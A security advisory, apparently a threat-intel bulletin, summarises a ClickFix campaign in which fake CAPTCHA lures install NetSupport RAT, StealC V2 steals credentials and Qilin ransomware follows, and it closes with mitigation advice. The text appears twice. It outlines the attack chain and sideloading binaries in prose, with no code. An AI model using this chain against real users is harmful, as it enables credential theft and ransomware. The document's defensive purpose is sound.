Am Not a Robot: Clickfix Used to Deploy StealC and Qilin
Summary:
The ClickFix social engineering tactic has evolved into a primary delivery vector for high-impact cyberattacks, recently documented in a campaign leading to Qilin ransomware deployment. The attack initiates when a user navigates to a compromised but legitimate website, which triggers an obfuscated JavaScript file to fingerprint the host. This script serves as a "human verification," or CAPTCHA-style lure that instructs the user to execute a series of manual steps, effectively turning the victim into an unwitting accomplice in their own infection. By following these prompts, the user inadvertently executes a batch file that installs NetSupport Manager (frequently dubbed "NetSupport RAT"). This legitimate remote access tool is then leveraged by threat actors to establish a persistent foothold and exfiltrate data.
In this specific campaign, the NetSupport infection was used as a staging ground to download StealC V2, a sophisticated infostealer released in March 2025 that features enhanced stealth and multi-monitor data capture. The infostealer harvested privileged credentials from the victim's environment, which were subsequently used to gain unauthorized access to a Fortinet VPN device. Approximately one month after the initial infostealer compromise, Qilin affiliates (linked to the GOLD FEATHER threat group) utilized this access to move laterally and deploy ransomware across the network. This incident underscores a growing trend where low-complexity social engineering is combined with advanced credential-theft tools to facilitate full-scale ransomware-as-a-service (RaaS) operations.
Security Officer Comments:
The ClickFix technique represents a significant shift in the threat landscape, as it bypasses traditional browser security features like Google Safe Browsing by relying on manual user execution via the Windows Run dialog (Win+R) or PowerShell. From an OSINT perspective, the rapid growth of this tactic, reportedly seeing a 517% increase in detections between 2024 and 2025, suggests it has become a highly commoditized "initial access as a service" product. The use of legitimate binaries like client32.exe (NetSupport) and mfpmp.exe (Microsoft Media Foundation) for DLL sideloading further complicates detection, as these files often carry valid digital signatures that satisfy basic endpoint security checks.
The transition from a StealC V2 infection to Qilin ransomware demonstrates the efficiency of the Initial Access Broker (IAB) ecosystem. The month-long dwell time between the infostealer deployment and the ransomware note indicates a deliberate phase of "log" processing, where harvested credentials are sold on underground marketplaces like Russian Market or transferred directly to affiliates. Analysts should note that the exposure of ports such as 3389 (RDP) and 5986 (WinRM) on C2 infrastructure is a common hallmark of these campaigns, used for hands-on-keyboard activity once a foothold is established.
Suggested Corrections:
CTU researchers recommend that organizations implement good cybersecurity hygiene to mitigate the threat from ransomware. These practices include patching vulnerable internet-facing devices and services in a timely manner, only exposing potentially vulnerable services such as RDP to the internet if there is a business need, and robustly implementing phishing-resistant multi-factor authentication (MFA) across the network. Endpoint detection and response (EDR) solutions are also essential for identifying and mitigating precursor ransomware activity.
Link(s):
https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin
The ClickFix social engineering tactic has evolved into a primary delivery vector for high-impact cyberattacks, recently documented in a campaign leading to Qilin ransomware deployment. The attack initiates when a user navigates to a compromised but legitimate website, which triggers an obfuscated JavaScript file to fingerprint the host. This script serves as a "human verification," or CAPTCHA-style lure that instructs the user to execute a series of manual steps, effectively turning the victim into an unwitting accomplice in their own infection. By following these prompts, the user inadvertently executes a batch file that installs NetSupport Manager (frequently dubbed "NetSupport RAT"). This legitimate remote access tool is then leveraged by threat actors to establish a persistent foothold and exfiltrate data.
In this specific campaign, the NetSupport infection was used as a staging ground to download StealC V2, a sophisticated infostealer released in March 2025 that features enhanced stealth and multi-monitor data capture. The infostealer harvested privileged credentials from the victim's environment, which were subsequently used to gain unauthorized access to a Fortinet VPN device. Approximately one month after the initial infostealer compromise, Qilin affiliates (linked to the GOLD FEATHER threat group) utilized this access to move laterally and deploy ransomware across the network. This incident underscores a growing trend where low-complexity social engineering is combined with advanced credential-theft tools to facilitate full-scale ransomware-as-a-service (RaaS) operations.
Security Officer Comments:
The ClickFix technique represents a significant shift in the threat landscape, as it bypasses traditional browser security features like Google Safe Browsing by relying on manual user execution via the Windows Run dialog (Win+R) or PowerShell. From an OSINT perspective, the rapid growth of this tactic, reportedly seeing a 517% increase in detections between 2024 and 2025, suggests it has become a highly commoditized "initial access as a service" product. The use of legitimate binaries like client32.exe (NetSupport) and mfpmp.exe (Microsoft Media Foundation) for DLL sideloading further complicates detection, as these files often carry valid digital signatures that satisfy basic endpoint security checks.
The transition from a StealC V2 infection to Qilin ransomware demonstrates the efficiency of the Initial Access Broker (IAB) ecosystem. The month-long dwell time between the infostealer deployment and the ransomware note indicates a deliberate phase of "log" processing, where harvested credentials are sold on underground marketplaces like Russian Market or transferred directly to affiliates. Analysts should note that the exposure of ports such as 3389 (RDP) and 5986 (WinRM) on C2 infrastructure is a common hallmark of these campaigns, used for hands-on-keyboard activity once a foothold is established.
Suggested Corrections:
CTU researchers recommend that organizations implement good cybersecurity hygiene to mitigate the threat from ransomware. These practices include patching vulnerable internet-facing devices and services in a timely manner, only exposing potentially vulnerable services such as RDP to the internet if there is a business need, and robustly implementing phishing-resistant multi-factor authentication (MFA) across the network. Endpoint detection and response (EDR) solutions are also essential for identifying and mitigating precursor ransomware activity.
Link(s):
https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin